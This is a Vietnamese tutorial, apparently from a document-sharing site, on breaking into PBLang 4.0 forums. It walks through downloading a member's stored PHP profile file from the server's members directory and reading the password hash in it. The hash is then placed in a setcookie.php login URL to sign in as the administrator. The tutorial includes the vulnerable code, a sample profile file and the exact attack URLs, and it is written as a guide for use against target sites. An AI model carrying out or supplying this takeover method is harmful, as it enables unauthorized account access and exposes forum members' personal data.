Hack PBLang forum 4.0 qua cookie
Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (42.7 KB, 3 trang )
Hack PBLang forum 4.0 qua cookie
trang này đã được đọc lần
Đặc điểm của PBLang:
Ngôn ngữ: PHP.
Tác giả: PB Dev Team & MPHH Project Team.
Home Page: />Nét đặc biệt:
Không sử dụng DB.(Nên tỉ lệ thành công của việc tấn công SQL Inject là 100%... thất bại)
Quản lí thành viên dựa trên cookie.
Cookie nằm luôn tại server chứ không nằm ở PC của người sử dụng như cookie của các forum
khác.
Các công cụ cần thiết:
Flash Get.
IntelliTamper (có thể có hoặc không).
Một bộ óc biết suy nghĩ. :-p
Một tách cà phê.
Sơ lược:
Ở một số forum, việc lấy được cookie của Admin thì cũng chả làm được gì vì không vào được
Admin Control Panel (ACP). Nhưng đối với PBLang thì cookie lại là vấn đề sống còn vì forum này
không hề sử dụng DB nên tất cả các thông tin về member đều nằm tại cookie.
Hãy thực hiện một ví dụ như sau:
- Vào trang login.php của một forum PBLang
- Đăng nhập bằng tên của Admin (giả sử là: 0Admin0) với mật khẩu bất kì.
- Và tất nhiên là sai password. Ta sẽ nhận được thông báo : Invalid password!
- Ok, nào bây giờ ta hãy nhìn lên thanh Address của IE xem. Ta sẽ thấy một URL có dạng sau:
http://www.[target].com/PBLang/setcookie.php?
u=0Admin0&p=098f6bcd4621d373cade4e832627b4f6
Tớ sẽ giải thích cái này sau, nào bây giờ hãy xem tiếp một phần của file setcookie.php:
...
$u=$HTTP_GET_VARS['u'];
$p=$HTTP_GET_VARS['p'];
include("global.php");
include($dbpath."/settings.php");
include_once("functions.php");
include_once("ffunctions.php");
$username=$HTTP_COOKIE_VARS[$cookieid];
if ($username=="") {
$loggedin="0";
$admin="0";
} else {
$filename = "$dbpath/members/$username";
if (!file_exists($filename)) {
$loggedin="0";
} else {
include("$dbpath/members/$username");
$admin=$useradmin;
$ban=$userban;
}
...
Chính các dòng này sẽ nhận nhiệm vụ kiểm tra pass của username mà ta đăng nhập có giống với
pass nằm trong cookie của username đó hay không.
Ớ cái URL mà tớ nói trên, file setcookie.php đã kiểm tra password có giá trị là:
098f6bcd4621d373cade4e832627b4f6 và so sánh nó với password nằm trong cookie của
username 0Admin0. Tất nhiên là sai rồi… và nhiệm vụ của chúng ta bây giờ là đi tìm password
(đã mã hoá) thích hợp để thế vào cái password sai bét đó.
Tìm password:
Như đã nói ở trên, tất cả các thông tin của user đều nằm trong cookie, và tất nhiên trong đó có
cả password (đã được mã hoá) của user đó. Như vậy chỉ cần có được cookie của một user bất kì
là bạn đã có thể vào được bằng username của user đó. Theo tớ biết thì các cookie của user đều
được đặt tại thư mục “/db/members/”
Đã đến lúc sữ dụng Flash Get.
Mở Flash Get --> chọn Jobs --> New Download --> xuất hiện cửa sổ “Add new download” --> tại
mục URL: nhập vào:
http://www/.[target].com/db/members/<cookie’s name>
(chổ cookie’s name bạn hãy thế vào tên của user mà bạn muốn lấy cookie). Còn tất cả các mục
còn lại thì giữ nguyên.
Sau khi download cookie của user nào đó về, bạn hãy mở nó ra. File cookie của PBLang có dạng
sau:
<?php
$userid="1";
$password="e10adc3949ba59abbe56e057f20f883e";
$username="0Admin0";
$useralias="Admin";
$userrealname="";
$useremail="";
$useremhide="";
$userip="";
$usersig="";
$userslogan="PBLang is super!";
$useravatar="none";
$usermsn="";
$userposts="0";
$usericq="";
$userqq="";
$userwebavatar="";
$userrank="7";
$useryahoo="";
$useraim="";
$userlocation="";
$userjoined="1052391784";
$userhomepage="http://";
$useradmin="1";
$usermod="0";
$userban="0";
$userfriend="";
$userlastvisit="1053052410";
$userlastpost="1052391784";
$userprevvisit="1052392402";
$useranimsmilies="";
$lastaliaschange="1052392188";
$userlang="en";
$uservisits="5";
?>
Thật thú vị, toàn bộ thông tin của member này đã phơi bày trước mắt ta, nào là username này,
tên thật này, trang chủ này, E-mail này, title này… ôi nhiều quá… nhưng cái mà ta cần nhất lại là
cái này : $password="e10adc3949ba59abbe56e057f20f883e"; đây chính là password (đã mã
hoá) thật sự của username này.
Ta hãy trở lại với cái URL có password sai bét mà tớ đã nói đến ở lúc đầu:
http://www.[target].com/PBLang/setcookie.php?
u=0Admin0&p=098f6bcd4621d373cade4e832627b4f6
Khi đã có được password đúng của username 0Admin0 ta hãy thế chúng vào URL trên:
http://www.[target].com/PBLang/setcookie.php?
u=0Admin0&p=e10adc3949ba59abbe56e057f20f883e
Xong, hãy nhấn nút Enter xem… “Aha tớ đã login vào với account Admin rồi… Hura!!!”
Chú ý:
-Tên của user nằm tại mục ”Who’s logged on” có thể không phải là username thật sự (tên mà
user sử dụng để login) của user đó mà chỉ là UserAlias (nếu bạn download cookie mà sữ dụng
UserAlias để làm tên của cookie cần down thì sẽ thất bại). Để biết chính xác được username thật
sự của user ta hãy và profile của thành viên (hoặc Admin) để xem (username thật sự nằm tại
mục ”Profile for <user name>”).
-Có thể Admin của forum đó đã đổi thư mục chứa cookie nên bạn có thể dùng IntelliTamper để
xem cấu trúc của web site và xác định đượv thư mục chứa cookie.
-Nếu down file cookie kkhông được thì bạn hãy dùng Web Downloader để down cả trang web về
ổ cứng, sau đó tìm cookie.
